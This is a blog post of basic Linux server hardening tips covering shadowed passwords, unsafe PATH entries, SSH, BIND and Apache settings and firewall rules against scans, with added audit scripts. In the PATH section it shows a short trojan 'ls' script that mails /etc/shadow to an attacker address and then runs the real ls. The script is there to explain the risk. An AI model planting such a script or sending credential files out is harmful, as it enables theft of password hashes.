Security Tips for Your Linux (Server) (Part 1)

It has been a long time since I published anything on the blog, and I would like to share some tips taken from a book (among others). I found it at the University and have just read it, and although it is honestly out of date and the techniques shown are very unlikely to work given how the system has evolved, they are still interesting aspects that can be shown. 9788448140502

I want to make clear that these are tips aimed at a Linux system used as a server, at medium or perhaps large scale, because at the desktop user level, although they can be applied, they will not be very useful.

I also note that these are simple quick tips and I will not go into much detail, although I plan to write another, much more specific and extensive post on a particular topic. But we will see that later. Let's begin.

Password policies.

Although it sounds like a catchphrase, having a good password policy makes the difference between a vulnerable system and one that is not. Attacks such as "brute force" take advantage of a bad password to gain access to a system. The most common advice is:

  • Combine uppercase and lowercase letters.
  • Use special characters.
  • Numbers.
  • More than 6 characters long (hopefully more than 8)

In addition to this, let's consider two important files: /etc/passwd and /etc/shadow.

The most important point concerns the /etc/passwd file. Besides giving us the user name, their uid, the home folder path, the shell, etc., in some cases it also shows the user's encrypted key (strictly speaking, a hash of the password).

Let's look at its typical layout.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

user:cryptkey:uid:gid::path:bash

(The empty fifth field is the comment field.)

The real problem here is that this particular file has permissions -rw-r--r--, which means it is readable by any user on the system, and with the encrypted key in hand it is not very difficult to work out the real one.

That is why the /etc/shadow file exists. This is the file where all user keys are stored, among other things. This file has the permissions needed so that no unprivileged user can read it.

To fix this, then, we must go to the /etc/passwd file and change the encrypted key to an "x"; this keeps the key only in our /etc/shadow file.

desdelinux:x:500:501::/home/usuario1:/bin/bash
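
The check described above can be automated. The following script is an added example, not part of the original post: it reports accounts whose password field in a passwd-format file is not shadowed and tests whether a file is world-readable. The function names and every sample line except the first are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): audit a passwd-format file.

# Constructed sample: the first line is the post's own example, the rest are made up.
sample_passwd() {
    cat <<'EOF'
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
guest::1001:1001::/home/guest:/bin/bash
EOF
}

# Print "user<TAB>finding" for every account whose second field is a risk.
# "x" means the hash lives in /etc/shadow; "*" or a leading "!" means no
# password login is possible. Anything else is a hash every user can read.
unshadowed_accounts() {
    awk -F: '
        NF < 7                  { next }   # skip blank or malformed lines
        $2 == ""                { printf "%s\tempty password field\n", $1; next }
        $2 == "x" || $2 == "*"  { next }
        substr($2, 1, 1) == "!" { next }
                                { printf "%s\thash stored in passwd\n", $1 }
    ' "$1"
}

# Exit 0 when "other" users can read the file, which must not be true of shadow.
world_readable() {
    [ -n "$(find "$1" -prune -perm -004 -print)" ]
}

# Demo on the constructed sample; on a real host pass /etc/passwd to
# unshadowed_accounts and /etc/shadow to world_readable.
tmp=$(mktemp) && sample_passwd > "$tmp"
unshadowed_accounts "$tmp"
rm -f "$tmp"
```

On distributions that ship the shadow utilities, `pwconv` moves the hashes of all accounts into /etc/shadow and leaves the "x" behind, which avoids losing a password while editing by hand.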

Problems with PATH, .bashrc and others.

When a user runs a command in their console, the shell looks for that command in the list of directories contained in the PATH environment variable.

If you type "echo $PATH" in the console, it will output something like this.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Each of these folders is a place where the shell will look for the command you typed. The "." means that the first folder to be searched is the very folder from which the command is run.

Suppose there is a user "Carlos" and this user wants to "do evil". This user could leave a file called "ls" in his home folder, and in this file run a command like this:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

And if the root user, for whatever reason, goes there and tries to list the folders inside carlos's folder, then (since the shell looks for the command in that same folder first) root would unknowingly send the password file to this e-mail address, after which the folders would be listed, and root would not notice until much later.

To avoid this, we must remove the "." from the PATH variable.

In the same way, files such as .bashrc, .bash_profile and .login should be audited to check that there is no "." in the PATH variable; in fact, from files like these the destination of a specific command can be changed.
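
The audit described above, as an added example that is not part of the original post. It goes slightly beyond the text: an empty PATH entry (a leading, trailing or doubled colon) also means the current directory, so it is reported as well. The function names and the sample startup file are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): find PATH entries that make the
# shell search the current directory, in a PATH string or a startup file.

# Print "position<TAB>entry<TAB>reason" for each unsafe entry of $1.
# Entries that start with "$" (such as $PATH or $HOME/bin) are skipped
# because their value is only known when the shell expands them.
unsafe_path_entries() {
    printf '%s\n' "$1" | awk -F: '{
        for (i = 1; i <= NF; i++) {
            c = substr($i, 1, 1)
            if ($i == "")       printf "%d\t(empty)\tempty entry means current directory\n", i
            else if ($i == ".") printf "%d\t.\tcurrent directory\n", i
            else if (c != "/" && c != "$") printf "%d\t%s\trelative path\n", i, $i
        }
    }'
}

# Check every PATH assignment in startup file $1 and prefix each finding with
# its line number. Quotes around the value are removed before the check.
audit_rc_file() {
    grep -nE '^[[:space:]]*(export[[:space:]]+)?PATH=' "$1" |
    while IFS= read -r hit; do
        value=$(printf '%s\n' "${hit#*PATH=}" | tr -d "\"'")
        unsafe_path_entries "$value" | sed "s/^/line ${hit%%:*}: /"
    done
}

# Demo: the PATH shown in the post, then a constructed startup file.
unsafe_path_entries ".:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin"
rc=$(mktemp)
printf '%s\n' '# constructed sample' 'alias ll="ls -l"' 'export PATH="$PATH:."' > "$rc"
audit_rc_file "$rc"
rm -f "$rc"
```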

Tips for services:

SSH

  • Disable version 1 of the ssh protocol in the sshd_config file.
  • Do not allow the root user to log in over ssh.
  • The files and folders ssh_host_key, ssh_host_dsa_key and ssh_host_rsa_key must be readable only by the root user.

BIND

  • Change the welcome message in the named.conf file so that it does not show the version number
  • Restrict zone transfers, and enable them only for the hosts that need them.

Apache

  • Prevent the service from displaying its version in the welcome message. Edit the httpd.conf file and add or modify the lines:

ServerSignature Off
ServerTokens Prod

  • Disable automatic indexing
  • Configure apache so that it does not serve sensitive files such as .htaccess, *.inc, *.jsp, etc.
  • Remove the manual pages or samples from the service
  • Run apache in a chrooted environment

Network security.

It is important to cover every possible entry into your system from the external network; here are some essential tips to prevent intruders from scanning and obtaining information from your network.

Block ICMP traffic

The firewall should be configured to block all types of incoming and outgoing ICMP traffic and echo replies. This prevents, for example, a scanner looking for live hosts in an IP range from finding you.

Avoid the TCP ping scan.

Another way to scan your system is the TCP ping scan. Suppose your server has an Apache server on port 80. The intruder could send an ACK request to that port; if the system responds, the machine is known to be alive and the intruder will go on to scan the remaining ports.

For this, your firewall should always have the "state awareness" option and should discard all ACK packets that do not correspond to an already established TCP connection or session.

Some additional tips:

  • Use IDS systems to detect port scans on your network.
  • Configure the firewall so that it does not trust the source port settings of a connection.

This is because some scans use a "fake" source port such as 20 or 53, since many systems trust these ports because they are typical of ftp or DNS.
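
One way to express the firewall advice above with iptables, as an added example that is not part of the original post. The `rule` wrapper, the `APPLY` variable and the choice of rules are assumptions of this example; by default the script only prints the commands it would run.

```shell
#!/bin/sh
# Added example (not from the original post): a stateful iptables rule set
# for the advice above. It prints the commands; set APPLY=1 and run as root
# to load them instead.

rule() {
    if [ "${APPLY:-0}" = 1 ]; then iptables "$@"; else echo "iptables $*"; fi
}

stateful_ruleset() {
    rule -P INPUT DROP                      # default: drop what no rule accepts
    rule -A INPUT -i lo -j ACCEPT
    # ICMP is dropped in both directions, so echo requests get no reply.
    rule -A INPUT  -p icmp -j DROP
    rule -A OUTPUT -p icmp -j DROP
    # A bare ACK that belongs to no tracked connection is classed INVALID, or
    # NEW when conntrack's loose pickup is enabled; both cases are dropped.
    rule -A INPUT -m conntrack --ctstate INVALID -j DROP
    rule -A INPUT -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
    # Replies that belong to connections which are already tracked.
    rule -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    # New connections are accepted by destination port only (port 80 is the
    # post's Apache example); no rule matches on --sport, so a probe sent from
    # source port 20 or 53 gets no special treatment.
    rule -A INPUT -p tcp --dport 80 --syn -m conntrack --ctstate NEW -j ACCEPT
}

stateful_ruleset
```

Dropping every ICMP type, as the post advises, also drops the "fragmentation needed" errors that path MTU discovery relies on, so test large transfers after loading the rules.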

NOTE: Remember that most of the problems shown in this post have already been solved in almost all current distributions. But it never hurts to have the key information about these problems so that they do not happen to you.

NOTE: Later I will look at a specific topic and write a post with much more detailed and current information.

Thanks to everyone for reading.

Greetings


  1.   usosayensi wekhompyutha said

    I really liked this article and I am interested in the topic; I encourage you to keep uploading content.